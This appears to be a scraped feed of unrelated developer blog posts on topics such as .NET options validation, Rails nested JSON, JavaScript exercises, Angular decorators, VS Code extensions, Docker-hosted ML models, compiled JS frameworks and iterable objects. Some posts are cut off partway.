*Data Annotations* is not the only way to validate the options. The `Validate()` method provides a delegate `Func<TOptions, bool>` that allows any kind of validation strategy.
This sample uses the library **Fluent Validation** with `InlineValidator<T>` just to exemplify:
```c#
=> services
.AddOptions<ApplicationOptions>()
.Bind(section)
.Validate(options =>
{
var validator = new InlineValidator<ApplicationOptions>();
validator
.RuleFor(applicationOptions => applicationOptions.HttpClientAddress)
.NotNull()
.NotEmpty()
.WithMessage("HttpClientAddress must be informed");
return validator
.Validate(options, strategy => strategy.ThrowOnFailures())
.IsValid;
})
.ValidateOnStart();
```
### Conclusion
This tool as simple as powerful to help to have a better development environment. | antoniofalcaojr |
710,587 | Accessing Nested Resources Through Fetch Requests | My fourth project for FlatIron was the most challenging so far, but learned so much about JS and work... | 0 | 2021-05-27T20:53:45 | https://dev.to/rickysonz/accessing-nested-resources-through-fetch-requests-with-a-has-many-through-relationship-op9 | My fourth project for FlatIron was the most challenging so far, but learned so much about JS and working with a back end server. In this blog we will review a way that to access nested resources and manipulate an API's JSON responses to retrieve specific nested data to present with JS in the front end of the program.


####Schema in Rails####
Library has many Songs through Liked Songs
Songs have many Libraries through Liked Songs
Liked Songs belong to Library/ Song
The schema in Rails says that this Liked Song does not have any attributes of a Song like name, artist, etc. as it is purely a relationship table on the back end. But when looking at the JS class that is Liked Song it does include all of those attributes. This is made possible because of Rail's ability to render JSON that includes nested resources as well as the new ES6 Classes and Constructor in Javascript.

By utilizing **(json: -> include())** rails will pass back not only the Liked Song relationship information but also the song information that is nested. Basically, in Rails the way we constructed the JSON response for Liked Songs will always have Song information nested in it.

When a JSON response comes back, this function iterates through the Liked Song INDEX array and pulls the Song value from these Liked Songs. The front end knows to do this because when iterating through the song attribute hash is being called on in **object[i].song**. object is a variable for the JSON response and object[i] calls that instance in the iteration. Then the Song value is pulled by **calling the .song attribute on the response.**
The front end then instantiates new instances of a Liked Song from the Song information in this response, as the constructor parameters are satisfactory for a new Liked Song. It is key to remember that with a Rails API you are controlling this information that comes back to your front end through the render at the end of your controller method. If you initialize Rails models and controllers through `rails generate`, they will not automatically render these nested resources even if relationships were set properly upon migration.

One other key thing to keep in mind is where the fetch calls are being sent, and if your routes are set up properly to handle this. In this project I left Liked Songs under Libraries which were under Users. Ensure that you make the fetch call to the right route and with the proper method in order to end up rendering your desired nested resources. **Saving data such as IDs to simulate a logged in experience is possible through using Local Storage and Session Storage.**


At this point it really is up to the developer how they want to utilize and present this information from this relationship map. For example, my application was essentially a mock Spotify Library, and if a Song was liked by a User, it would re-render all of the Liked Songs in the library so that it would include the new Liked Song. Another example could be an apartment finding site where a User class can like an Apartments Class that is kept track of in LikedApartments Class. When passing back a Liked Apartment, you can also pass the Apartment info.

| rickysonz | |
710,593 | Finding the Longest Word in a String | Let's return the length of the longest word in the provided sentence. Also the response should be a... | 0 | 2021-05-27T21:03:16 | https://dev.to/rthefounding/finding-the-longest-word-in-a-string-35o7 | javascript, tutorial, beginners, webdev | * Let's return the length of the longest word in the provided sentence.
* Also the response should be a number in this instance.
```
function findLongestWordLength(str) {
return str.length;
}
findLongestWordLength("The quick brown fox jumped over the lazy dog");
```
* Answer:
```
function findLongestWordLength(str) {
let words = str.split(" ");
let longest = "";
for (let i = 0; i < words.length; i ++) {
let tempLong = words[i];
if (tempLong.length > longest.length) {
longest = tempLong;
}
}
return longest.length;
}
findLongestWordLength("The quick brown fox jumped over the lazy dog"); // will display 6
```
#### Code Explanation
* Take the string and convert it into an array of words. Declare a variable to keep track of the maximum length and loop from 0 to the length of the array of words.
* Then check for the longest word by comparing the current word to the previous one and storing the new longest word. At the end of the loop just return the number value of the variable maxLength.
###OR
```
function findLongestWordLength(str) {
let words = str.split(" ");
let longest = "";
for (let word of words) { // <-----
if (word.length > longest.length) {
longest = word;
}
}
return longest.length;
}
findLongestWordLength("The quick brown fox jumped over the lazy dog");
```
* Here instead of the for loop that loops through the indexes we loop through the elements themselves.
| rthefounding |
710,655 | Your Angular code base is deprecated. | No, upgrading to Angular 12.x.x will not help. It's still deprecated. The Typescript experimental de... | 0 | 2021-05-27T23:27:40 | https://dev.to/shivamd20/your-angular-code-base-is-deprecated-315e | angular, javascript, typescript, decorators | No, upgrading to Angular 12.x.x will not help.
It's still deprecated.
The Typescript experimental decorators were based on [TC39 proposal-decorators](https://github.com/tc39/proposal-decorators).
We use the same Decorators in our Angular codebase to create services, components and other Angular constructs.
But the same TC39 proposal has evolved in a different direction which is semantically not compatible with the experimental Typescript decorators.
The new spec for Decorators is easier to use and write.
This draft is still in stage-2 and may again change in the future.
You can find the detailed comparison between old and new decorators [here](https://github.com/tc39/proposal-decorators#comparison-with-typescript-experimental-decorators).
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">Just finished up the first draft of the new decorators spec, pretty excited about it 😄 <a href="https://t.co/ELhZbsiaiR">https://t.co/ELhZbsiaiR</a></p>— The p is silent (@pzuraq) <a href="https://twitter.com/pzuraq/status/1397716184867295232?ref_src=twsrc%5Etfw">May 27, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">Does this mean that Typescript experimental decorators will not be compatible with Javascript decorators 😨</p>— Shivam (@Shivamd20) <a href="https://twitter.com/Shivamd20/status/1398043762664693760?ref_src=twsrc%5Etfw">May 27, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">Unfortunately no, the new proposal has differing semantics from previous proposals in a number of ways. TypeScript experimental decorators were also incompatible with the Define semantics class fields, which caused a decent amount of breakage in the ecosystem.</p>— The p is silent (@pzuraq) <a href="https://twitter.com/pzuraq/status/1398044922645671936?ref_src=twsrc%5Etfw">May 27, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">When the proposal advances, figuring out a step-by-step incremental upgrade path for existing decorators users is definitely going to be a priority though! No user left behind 😄</p>— The p is silent (@pzuraq) <a href="https://twitter.com/pzuraq/status/1398045108805640195?ref_src=twsrc%5Etfw">May 27, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
Let's just hope that this doesn’t result in fragmentation of JavaScript decorators. We have already faced a lot inconvenience due to [commonsjs and ES6 imports](https://stackoverflow.com/questions/52567493/why-node-uses-require-not-import). | shivamd20 |
710,750 | Build an idea generator from scratch, part 1: Project setup with Github and dotenv [Video] | So as I was finishing up teaching my web development class last year, I really wanted to give my... | 0 | 2021-05-28T01:32:45 | https://dev.to/ashleykolodziej/build-an-idea-generator-from-scratch-part-1-project-setup-with-github-and-dotenv-video-34mn | video, javascript, tutorial, codenewbie | {% youtube TqdmUdi8xbY %}
So as I was finishing up teaching my web development class last year, I really wanted to give my students something to help them continue growing and learning. I decided to build an idea generator with HTML, CSS, and JavaScript using the [raindrop.io API](https://developer.raindrop.io/), and now, I’m finally getting around to posting the process recordings. Woohoo! I’ll be posting a new recording each week.
In this first part of the tutorial, we'll set up a Github repository, get our template code set up, and install dotenv, a library which will help us make an authenticated call to the API securely. You'll also see your first introduction to Git Flow. I use Tower to make things a little easier, but you can use any method of interacting with git you like. This would be a great intermediate JavaScript challenge for someone looking to practice ES6 syntax!
## This video covers:
- How to set up a new repository in Github using a template
- How to clone a remote Github repository to your computer
- How to use Git Flow to create a feature branch
- How to make an authenticated call to an API using JavaScript
- How to use dotenv to store access tokens and other sensitive information in your app without committing it to your codebase
... and so much more!
## The final product
In this series, we’ll be working toward [this idea generator](https://professorkolodziej.github.io/idea-generator/) as our final product.
## Code links
Follow along by cloning or forking the main branch here: https://github.com/ProfessorKolodziej/idea-generator
You can also start on your own project by using my Student Site Boilerplate template: https://github.com/ProfessorKolodziej/student-site-boilerplate/
**[Catch the new video over here.](https://youtu.be/TqdmUdi8xbY)** Happy coding!
---
**I'm always happy to connect!**
🐰 [@ashleykolodziej on Twitter](https://twitter.com/ashleykolodziej)
🐰 [Subscribe to Professor K Explains on YouTube](https://www.youtube.com/c/ProfessorKExplains?sub_confirmation=1) | ashleykolodziej |
711,073 | Notion template to organize your chords 🎸and learning guitar | Hey folks 👋🏼 We just launched another Product on Product Hunt. It's a notion template that helps you... | 0 | 2021-05-28T10:55:12 | https://dev.to/xenoxdev/notion-template-to-organize-your-chords-and-learning-guitar-4j6a | watercooler, showdev | Hey folks 👋🏼
We just launched another Product on Product Hunt. It's a notion template that helps you to organize your chords and learn guitar
### Learn Guitar
An amazing template to make your dreams of playing that dreamy song on your own, come true. This template will help you keep track of your guitar learning progress.
{% youtube zYcRf5VIsk0 %}
It contains two databases:
* Chords
* My Songs
### Chords
It contains all the chords identified with a name, an image, and your learning progress. This template is complete with a feature that will add a new chord with its status set to Next.

### Chords Views
The Chords Collection lets you choose from database, learning status, and chords gallery, showcasing how many chords you have collected so far!
**Chord Gallery View**

**Board View**

### My Songs
It contains all the songs you like and want to practice, identified with the title, artist, learning status bar and the list of chords that are required to play it. (related to the 🎼Chords database). New songs can be added with the provided template. It will automatically create a song with Next status and add the gallery and table views along with all the other sections.

**Detailed View**
Inside the song page, a detailed view of the song with a linked database showing the chords gallery is provided along with the chords table, followed by the embedded video and audio of the song, and the lyrics.
It also has a comments field so you can add your personal notes.

### My songs Views
You have the freedom to choose from List, database, and Learning Status view, to track your progress in real-time
**List View**

**Board view**

### Want One?

***Here is your link*** 👉 [***Learn Guitar***](https://prototion.com/notion-template/Learn-Guitar-WiaqM2TMIVAv1qCF)
We are on Producthunt today. Go show some love here🔥
[](https://www.producthunt.com/posts/notion-guitar-learning)
| sarthology |
711,459 | 12 Best VS Code Extensions To Enhance Your Productivity | Visual Studio Code is one of the well-known and most widely used code editors in the developer commun... | 0 | 2021-05-28T16:40:17 | https://dev.to/coursesity/12-best-vs-code-extensions-to-enhance-your-productivity-4ok | vscode, codenewbie, 100daysofcode, programming | Visual Studio Code is one of the well-known and most widely used code editors in the developer community. The reason for its popularity is its numerous extensions that speed up the development process. But, one of the best things about VS code is its customizability, primarily via extensions.
So, this article involves an overview of the 12 best extensions for VSCode that will make you a more productive developer. Here's a list of extensions we will cover in this article:
- Auto Rename Tag
- Snippets
- GitLens
- Icons
- Import Cost
- Prettier
- Markdown All in One
- Better Comments
- Profile Switcher
- Bracket Pair Colorizer
- Debugger for Chrome
- Settings Sync
### **1. [Auto Rename Tag](https://marketplace.visualstudio.com/items?itemName=formulahendry.auto-rename-tag)**

As the names imply, the Auto Rename Tag renames the second tag as the first one is updated and vice versa. This extension is not only beneficial for HTML but also for React since it comes with JSX. It is a super helpful VS Code extension for web developers.
### **2. [Snippets](https://code.visualstudio.com/docs/editor/userdefinedsnippets)**

The best way to save time and boost productivity is to use Snippets. It is not one extension but a collection of extensions with various snippets for several programming languages. Some popular code snippets extensions include:
- Python
- Vue 3 Snippets
- ES7 React/Redux/GraphQL/React-Native snippets
- HTML Snippets
- JavaScript (ES6) code snippets
- Angular Snippets (version 11)
### **3. [GitLens](https://marketplace.visualstudio.com/items?itemName=eamodio.gitlens)**

Developed and maintained by Eric Amodio, GitLens is an open-source extension for Visual Studio Code. It combines the capabilities of Git and VS Code. Therefore, one of the best features of this extension is its ability to visualize code authorship through Git blame annotations and code lens. Some other essential features include:
- A **status bar blame** annotation shows the commit and author who last modified the current line.
- Smooth **Revision navigation** (backward and forward) through the history of a file.
- An unpretentious **current line blame** annotation at the end of the line shows the commit.
### **4. [Icons](https://marketplace.visualstudio.com/items?itemName=vscode-icons-team.vscode-icons)**

The use of descriptive icons can help you differentiate between files and folders. They also make development more enjoyable. Although there are many icons extension that you can choose from, the following icons are the most popular:
- Material Icon Theme
- Simple icons
- vs-code icons
- Material Theme Icons
### **5. [Import Cost](https://marketplace.visualstudio.com/items?itemName=wix.vscode-import-cost)**

The Import Cost extension shows you the estimated size of the import package in your code. While working on a project, it's essential not to jeopardize the user experience by importing heft packages. You can dodge this by keeping track of the size of additional dependencies in your code.
Import Cost warns you if the import is too large by highlighting it in red. You can select whether the import should be considered small, medium, or large.
### **6. [Prettier](https://marketplace.visualstudio.com/items?itemName=esbenp.prettier-vscode)**

With more than 38.5k stars on GitHub, Prettier is one of the most popular code formatters available. Consistent formatting and styling across your code can save you a lot of time, especially when working with other developers.
The extension is compatible with Prettier plugins when used with a locally resolved version of Prettier. You can further customize this extension to meet your formatting needs and trigger it with autosave.
### **7. [Markdown All in One](https://marketplace.visualstudio.com/items?itemName=yzhang.markdown-all-in-one)**

Since the release of Markdown in 2004, it has become one of the most popular markup languages. Thanks to its lightweight simplicity and cross-platform usage, it is widely preferred by technical writers. Markdown All in One is an individual extension that fulfills all your markdown needs, such as auto-preview, shortcuts, autocomplete, etc.
For example, if you want to bold some text in Markdown, all you have to do is select the text and press Ctrl+B.
### **8. [Better Comments](https://marketplace.visualstudio.com/items?itemName=aaron-bond.better-comments)**

Better Comments extension helps you write more human-friendly comments in your code. Precise and digestible comments are advantageous not only for someone going through your code but also for you. It's not uncommon for developers to get lost in their code after some time. Having descriptive comments can save you and your team a lot of time.
You can categorize the annotations you make with Better Comments VS Code into alerts, queries, to-dos, highlights, etc. After a double forward-slash (//), you can use either of the following characters.
- (!) for errors and warnings
- (//) for strikethrough
- TODO for to-dos
- (*) for highlighted text
- (?) for queries and questions
### **9. [Profile Switcher](https://marketplace.visualstudio.com/items?itemName=aaronpowell.vscode-profile-switcher)**

Profile Switcher allows you to switch between and set up multiple profiles in VS Code with different settings and configurations. You can set up a profile-required setting to display your VS Code screen instead of having to change your settings every time.
### **10. [Bracket Pair Colorizer](https://marketplace.visualstudio.com/items?itemName=CoenraadS.bracket-pair-colorizer)**

Bracket Pair Colorizer extension matches corresponding brackets with the same color. It can be baffling to have multiple parentheses, brackets, etc., in a file containing nested components, functions, objects, etc.
### **11. [Debugger For Chrome](https://marketplace.visualstudio.com/items?itemName=msjsdiag.debugger-for-chrome)**

The Debugger for Chrome is an extension developed by Microsoft that lets you debug your JS code in VSCode. It's surprisingly smooth compared to debuggers in other IDEs. This tool lets you set breakpoints, step through the code and debug dynamically added scripts.
### **12. [Settings Sync](https://marketplace.visualstudio.com/items?itemName=Shan.code-settings-sync)**

With the Settings Sync extension, you can sync most of your settings on VSCode to Github, including keyboard shortcuts and other extensions for VSCode.
>
With Github, programmers can easily update their code and track how their work keeps evolving. Therefore, if you are just starting out with programming, it is highly recommended that you [learn Git](https://blog.coursesity.com/best-git-tutorials/).
By doing this, you'll have access to your preferred IDE on any device you like, instead of having to work in a vanilla VSCode environment on new devices or having to set everything up again manually.
If you have made it this far, then certainly you are willing to learn more. Here are some more topics that we think will be interesting for you.
- [11 Finest Java IDEs You Can Use In 2021](https://code.coursesity.com/best-java-ides)
- [50 Best SQL Interview Questions to Crack Your Next Interview Round](https://code.coursesity.com/sql-interview-questions)
- [50 Most Asked Python Interview Questions You Should Know in 2021](https://code.coursesity.com/python-interview-questions) | yashtiwari1k |
711,475 | Excel Formulas to Calculate the Time Duration With Number of Days!! | Have you ever tried to calculate the total time duration with the number of days in Excel? This artic... | 0 | 2021-05-29T03:00:26 | https://geekexcel.com/excel-formulas-to-calculate-the-time-duration-with-number-of-days/ | excelformula, excelformulas | ---
title: Excel Formulas to Calculate the Time Duration With Number of Days!!
published: true
date: 2021-05-28 14:46:48 UTC
tags: ExcelFormula,Excelformulas
canonical_url: https://geekexcel.com/excel-formulas-to-calculate-the-time-duration-with-number-of-days/
---
Have you ever tried to calculate the total **time duration with the number of days in Excel**? This article will show you some methods to achieve it. Let’s jump into this article!! Get an official version of ** MS Excel** from the following link: [https://www.microsoft.com/en-in/microsoft-365/excel](https://www.microsoft.com/en-in/microsoft-365/excel)
[](https://geekexcel.com/excel-formulas-to-calculate-the-time-duration-with-number-of-days/time-duration-with-days/#main)<figcaption id="caption-attachment-45737">Time duration with days</figcaption>
## Generic Formula:
- Use the below formula to calculate the time duration with the number of days, hours, and minutes.
**=days+[TIME](https://geekexcel.com/how-to-use-time-function-in-excel-365/)(hh,mm,0)**
## Syntax Explanations:
- **TIME** – In Excel, the [**TIME function**](https://geekexcel.com/how-to-use-time-function-in-excel-365/) helps to create time on your worksheet.
- **Days** – It represents the number of days.
- **Comma symbol (,)** – It is a separator that helps to separate a list of values.
- **Plus operator (+)** – This symbol is used to add the values.
## Example:
Let’s consider the below example image.
- First, we will enter the input values in **Column B** , **Column C** , and **Column D**.
- Here, we have to calculate the total time duration with the number of days.
<figcaption id="caption-attachment-45739">Input Ranges</figcaption>
- Select any cell and type the above-given formula.
<figcaption id="caption-attachment-45738">Enter the formula</figcaption>
- Finally, press **ENTER** to get the result out, if you need, drag the fill handle over range to apply the formula.
<figcaption id="caption-attachment-45740">Result</figcaption>
## Wind-Up:
From this article, you can get some clarification on **how to calculate the total time duration based on the given days, hours, minutes in Excel**. Hope you like it. If you have any **questions** , feel free to **comment**.
Thank you so much for visiting **[Geek Excel](https://geekexcel.com/)!! **If you want to learn more helpful formulas, check out [**Excel Formulas**](https://geekexcel.com/excel-formula/) **!! **
### Related Articles:
- **[How to Copy a Cell to Clipboard using Macros (VBA) in Excel 365?](https://geekexcel.com/how-to-copy-a-cell-to-clipboard-using-macros-vba-in-excel-365/)**
- **[Excel Formulas to Check the Date is within the Last N Days from Today!!](https://geekexcel.com/excel-formulas-to-check-the-date-is-within-the-last-n-days-from-today/)**
- **[Excel Formulas to Sum the Time by Week and Project ~ Easy Tricks!!](https://geekexcel.com/excel-formulas-to-sum-the-time-by-week-and-project/)**
- **[How to Search for a Value in All Tabs in Excel Office 365?](https://geekexcel.com/how-to-search-for-a-value-in-all-tabs-in-excel-office-365/)** | excelgeek |
711,482 | Running Machine Learning Model on Docker Container | The summary of what we're going to build: ->Pull the Docker container image of CentOS image from... | 0 | 2021-05-29T15:46:07 | https://dev.to/karthikkasukurti/running-machine-learning-model-on-docker-container-4k40 | **The summary of what we're going to build:**
->Pull the Docker container image of CentOS image from DockerHub and create a new container
-> Install the Python software on the top of docker container
-> In Container you need to copy/create machine learning model which you have created in jupyter notebook
Note: I will be using Red Hat linux as my Base machine.
**Starting Docker**
To start docker use this command: `systemctl start docker`
To check the status of Docker use command: `systemctl status docker`
**Installing centos on Docker**
To use the latest version of centos use this command: `Docker pull centos:latest`

**Checking whether OS has been installed or not**
Command to check: `docker ps -a`

**Launch Docker Image**
Use this command to launch the OS which you pulled from the Docker registry: `docker run -t -i <os-name> ` or `docker run -t -i --name=<container-name> <os-name>`
In our case, we have installed centos so replace `<os-name>` with `centos`. You can give your own `<container-name>`
For example: `docker run -t -i --name=ML1 centos`

Another way to start a Docker image is by running this command: `docker start <container-name>` and then `docker attach <container-name`
**Container**
Now that we're inside the container, this means that we're basically in a different operating system(OS).
To check the information about OS use: `cat /etc/os-release`

**Installing required packages to create ML model inside container**
Python language: `yum install python3`
Scikit library: `pip3 install scikit-learn`
Pandas library: `pip3 install pandas`
vim module to edit files: `yum install vim`
**Create the model**
First create a model in your Host OS and then copy file to Container using the following command: `docker cp <path-of-model> <container-name>:/<model-file-name>`
Ex: `docker cp model.py ml1:/model.py`

**Train the model**
First create a csv file named `Salary_Data.csv` using `vim Salary_Data.csv` and enter two columns namely `YearsExperience,Salary` and enter values as shown below,

Next we need to train the model using command: `python3 model.py`

Our model is to predict salary based on the person's experience(in yrs)

| karthikkasukurti | |
711,489 | How To Concate Two Dimensional Array
#javascript, #basic #arrays | How to concate Two dimensional Arrays without Using new Set? array=[[1,2,3],[4,5,6],[7,8,9]] // [1,2,... | 0 | 2021-05-28T17:58:07 | https://dev.to/naveed89tech/how-to-concate-two-dimensional-array-javascript-basic-arrays-2elj |
How to concate Two dimensional Arrays without Using new Set?
array=[[1,2,3],[4,5,6],[7,8,9]]
// [1,2,3,4,5,6,7,8,9]
For This we can use reduce Method.
array.reduce((a,b)=>a.concate(b),[ ]) | naveed89tech | |
711,692 | A Look at Compilation in JavaScript Frameworks | In 2017 Tom Dale, wrote Compilers are the New Frameworks. And he was right. In 2017 things were alrea... | 0 | 2021-06-01T21:58:09 | https://dev.to/this-is-learning/a-look-at-compilation-in-javascript-frameworks-3caj | javascript, webdev, svelte, marko | In 2017 Tom Dale, wrote [Compilers are the New Frameworks](https://tomdale.net/2017/09/compilers-are-the-new-frameworks/). And he was right. In 2017 things were already heading that way and have only continued on that trend since.
If you look at the whole range of build tools we use every framework is enhanced by some build ahead process. And if you want to take it to its natural extent you might land on, as @swyx did in his article [Language Servers are the new Frameworks](https://dev.to/dx/language-servers-are-the-new-frameworks-1lbm), down to a language itself.
But there are more steps still to go on this path. This trend of UI Framework in JavaScript being a language goes back much further. [Elm](https://elm-lang.org/)(2012), [Marko](https://markojs.com/)(2014), and [Imba](https://imba.io/)(2015) are just handful. But fast-forward to 2021 and we have many more libraries in this space.
And that's why it's more important to familiarize yourself with compilation in JavaScript frameworks. To understand what they are doing and more importantly what they can and cannot do.
# What is a Compiled JavaScript Framework?
Ones where end user code is run through a compiler to produce the final output. To be fair this might be a bit too loose but I want to show that the approach is a spectrum rather than a single target. The term most often gets associated with frameworks like [Svelte](https://svelte.dev/) or [Marko](https://markojs.com/) where everything ends up getting processed. But almost all popular frameworks use some form of ahead of time(AOT) compilation on their templates.
The reason is simple. Declarative interfaces are easier to reason about when you have systems where the inputs can come from many points and propagate through many related or non-related outputs. Most of these compiled frameworks are an extension of their templating languages. So that is the most reasonable place to start.
While there have been a few approaches over the years in the compiled camp now there are two main ones that stick out currently. HTML-first templating languages like [Svelte](https://svelte.dev/), [Vue](https://vuejs.org/), and [Marko](https://markojs.com/), and JavaScript-first templating languages like [JSX](https://facebook.github.io/jsx/).
```html
<section>
<h1>My favorite color</h1>
<div>${input.color.toUpperCase()}</div>
</section>
<shared-footer/>
```
HTML-first templating languages treat the source file like it is an enhancement of HTML and often will work as a perfectly valid HTML partial if used with pure HTML. Some of the earliest form used HTML string attributes for expressions, but most now use JavaScript expressions in their binding syntax.
```jsx
export default FavoriteColor(props) {
return <>
<section>
<h1>My favorite color</h1>
<div>{props.color.toUpperCase()}</div>
</section>
<SharedFooter />
</>;
}
```
JSX provides HTML like syntax that can be inlined expressions in your JavaScript. You can view it as almost a different syntax for a function call, and in many cases that is all it is. But JSX is not part of the JavaScript standard so several frameworks actually leverage its well-defined syntax the same way HTML based templates do.
# Optimizing Templates
A lot of the motivation for compiled frameworks has come from the desire to optimize these templates further. But there is a lot that can be done with the base templating language. They can be compiled differently for server and browser. They can serve as a means for feature detection to aggressively tree shake. And many frameworks use templating languages as way of doing ahead of time static analysis to optimize the the code that is generated for performance.
Most template-generated code is creation logic, whether it is a bunch of VDOM nodes or real DOM nodes. When looking at a template you can almost immediately identify which parts will never change like literal values in attributes, or fixed groupings of elements. This is low hanging fruit for any templating approach.
A VDOM library like [Inferno](https://infernojs.org/) uses this information to compile its JSX directly into [pre-optimized node](https://github.com/infernojs/babel-plugin-inferno#infernojs-babel-plugin) structures. [Marko](https://markojs.com/) hoist their static VDOM nodes outside of their components so that they don't incur the overhead of recreating them on every render. [Vue](https://vuejs.org/) ups the ante collecting dynamic nodes reducing subsequent updates to just those nodes.
[Svelte](https://svelte.dev/) separates its code between create and update lifecycles. [Solid](https://github.com/solidjs/solid) takes that one step further hoisting the DOM creation into clone-able Template elements that create whole portions of the DOM in a single call, incidentally a runtime technique used by Tagged Template Literal libraries like @webreflection's [uhtml](https://github.com/WebReflection/uhtml) and [Lit](https://lit.dev/).
```js
// Solid's compiled output
const _tmpl$ = template(
`<section><h1>My favorite color</h1><div></div></section>`
);
function FavoriteColor(props) {
const _el$ = _tmpl$.cloneNode(true),
_el$2 = _el$.firstChild,
_el$3 = _el$2.nextSibling;
insert(_el$3, () => props.color.toUpperCase());
return [_el$, createComponent(SharedFooter, {})];
}
export default FavoriteColor;
```
With non-VDOM libraries, like [Svelte](https://svelte.dev/) or [Solid](https://github.com/solidjs/solid), we can further optimize for updates as well since the framework is not built on a diff engine. We can use the statically known information like attributes and directly associate template expressions with them, without necessarily understanding much about those expressions. This is basically loop unwinding. Instead of iterating over a list of unknown properties we compile in the inline update expressions. You can think of it like:
```js
if (isDirty(title)) el.setAttribute("title", title);
```
We can even make some further assumptions from the input data in some cases. For example, [Solid](https://github.com/solidjs/solid)'s compiler knows that simple variable bindings are not reactive as the tracking system relies on getters. So it can choose not to put that code under the update path.
There are still limits to what can be analyzed ahead of time. Spreads have to fallback to runtime approaches as do dynamic components like [Svelte](https://svelte.dev/)'s `<svelte:component>` or [Vue](https://vuejs.org/)'s `<component>`.
The other dynamic parts like loops and conditionals are always done at runtime in every framework. **We cannot diff at build time.** We can just narrow down the possibilities for the runtime. But for things like managing lists there are no shortcuts. Their reconciliation methods make a up a good chunk of the pulled in runtime for any framework. Yes, even compiled frameworks have runtimes.
# Beyond Templates
Now it is arguable when you have Single File Components if you shouldn't view the whole file as the template and a library like [Svelte](https://svelte.dev/) or [Marko](https://markojs.com/) basically treats it as such. There are certain assumptions that can be made when you know that your file represents a single component.
In the case of [Svelte](https://svelte.dev/) this determines the reactive tracking boundary. All reactive atoms declared within a file on change tell the component to update. In so [Svelte](https://svelte.dev/) can basically compile away their reactive system, removing the need to manage any subscriptions, by simply augmenting every assignment with a call to update the component (`$$invalidate`).
```js
// excerpt from Svelte's compiled output
function instance($$self, $$props, $$invalidate) {
let { color } = $$props;
$$self.$$set = $$props => {
if ("color" in $$props)
$$invalidate(0, color = $$props.color);
};
return [color];
}
```
This is relatively easy for static analysis since the decision can be made by looking at where variables are defined in the scope and update all places they are used. But this is much harder to do automatically when these reactive atoms need to come outside the template. [Svelte](https://svelte.dev/) uses a `$` naming convention to signify the stores so the compiler can know how to setup subscriptions.
A similar local optimization is how [Marko](https://markojs.com/) looks for classes in their components to know if they are stateful. Depending on what life-cycles are present on them and the types of bindings being used in the template you can determine if these component need to be sent to the browser or only include them on the server. This simple heuristic with some bundler magic makes for a simple approach to Partial Hydration.
Both of these approaches use specific syntax to denote understanding the nature of their state. Their data has become part of their language. While not enforced, have you ever wondered about the potential value of the `use` prefix on [React](https://reactjs.org/) hooks?
# Beyond Modules?

The biggest limitation to compilation is the scope of what it can reasonably analyze. While we can do tricks to inform the compiler, like [Svelte](https://svelte.dev/)'s `$`, we tend to not see beyond `import` statements. This means we have to assume the worst when looking at what inputs come into our components (is it dynamic?). We don't know if children components use our stateful data in dynamic manner.
This hinders our ability for efficient composition. We need to fallback to usually different runtime mechanisms to fill this gap instead of leveraging the compiler's strengths. What if you could tell how a piece of data could affect the whole app at compile time?
So, for the most part we focus on local optimization. However, bundlers and minifiers get to work with final output code. While there is a lot we can do ahead of time to generate output that plays nice with their ability to optimize, at a certain point compilers will want to get in there too.
What we are doing through specific language is better understanding the developer's intent. Especially with heavy use of declarative constructs. This information is useful at all stages. This is something that is harder to do with general purpose programming languages.
# Conclusion
We are just scratching the surface of compiled JavaScript frameworks, but the techniques that we associate with pure compiled frameworks are working their way into others. For example, [Vue](https://vuejs.org/) has been exploring new [data-level language in their Single File Components](https://github.com/vuejs/rfcs/pull/228). And it is easy since the groundwork is already there.
The approach(HTML-first vs JS-first) each Framework takes to templating is mostly a superficial differentiator. There is very little meaningful difference here. But the devil is in the details when it comes feature support. Every framework has places where they have no choice but to lean heavier on their runtimes and these boundaries are commonly crossed in any significant application. So even code size isn't a clear benefit.
Where compilation excels is abstracting the complexity. From simpler syntax to interact with data and updates, to specialized output for server versus browser. This is a DX tool much like Hot Module Replacement on your bundler's Dev Server. It feeds into better IDE support since the program better understands your intent. And it also can bring performance gains.
Today, the biggest limitation to compiled approaches is that they are module scoped. If compiled approaches want to scale like runtime approaches this is a hurdle we will have to overcome. For now hybrid approaches might be the best solution. But even today, compilers are capable of so much it's hard to picture a future without them being a significant part.
| ryansolid |
711,802 | Laravel 8 Toastr Notifications using yoeunes/toastr package | Hi Friends In this Article, i will explicate you how to install and use toastr notifications utilizi... | 0 | 2021-05-29T04:16:15 | https://dev.to/sonagrabhavesh/laravel-8-toastr-notifications-using-yoeunes-toastr-package-2n3b | laravel, php, tutorial, programming | <p>Hi Friends</p>
<p>In this Article, i will explicate you how to install and use toastr notifications utilizing yoeunes/toastr package in Laravel 8 application.we will utilize yoeunes/toastr package.we will indite step be step tutorial for Laravel 8 toastr notifications.</p>
<p>Toastr notifications yoeunes/toastr package provides warning,prosperity,error and info notifications.You have to just follow few step for implement toastr notifications in your laravel application. In this example i give you example from scratch. So just follow bellow step.</p>
<strong class="step">Step 1: Install yoeunes/toastr package</strong>
more..
https://codingtracker.blogspot.com/2021/05/laravel-8-toastr-notifications-using.html | sonagrabhavesh |
711,837 | Making JS Objects iterable | Disclaimer: This is a fun task that I tried doing. I don't see a real world use case for this, especi... | 0 | 2021-05-30T09:27:38 | https://dev.to/ivinjose/making-js-objects-iterable-292j | javascript, generators, iterable, objects | *Disclaimer*: This is a fun task that I tried doing. I don't see a real world use case for this, especially because now that we have Maps in JS. Let me know in the comments if you can think of something.
Now thats out of the way, let's get to it.
As we know, Objects in JS are not iterable. That means you cannot use them with for...of. You must've come across errors similar to:
`TypeError: 'x' is not iterable`
###What are we trying to achieve?
We're trying to understand the technicalities behind the above error. And we will do it by making an object iterable.
###What does it mean when we say `iterable`?
When a value is iterable, under the hood, that value has an implementation of the iterable protocol.
That means, the prototype of that element must have a method which goes like:
`[Symbol.iterator](){}`
..and this method is supposed to return an object like:
```js
{
next(){
//we'll get to the definition of this method
}
}
```
..and this next() method will be called by the iterating functions like for...of. Each time they call next(), they expect an object of the syntax:
`{ value: <value of current iteration>, done: <boolean> }`
The `value` will be made available to the value in `for(const value of element)`, and `done` will be used to know if the iteration need to be stopped or continue.
###What will we do?
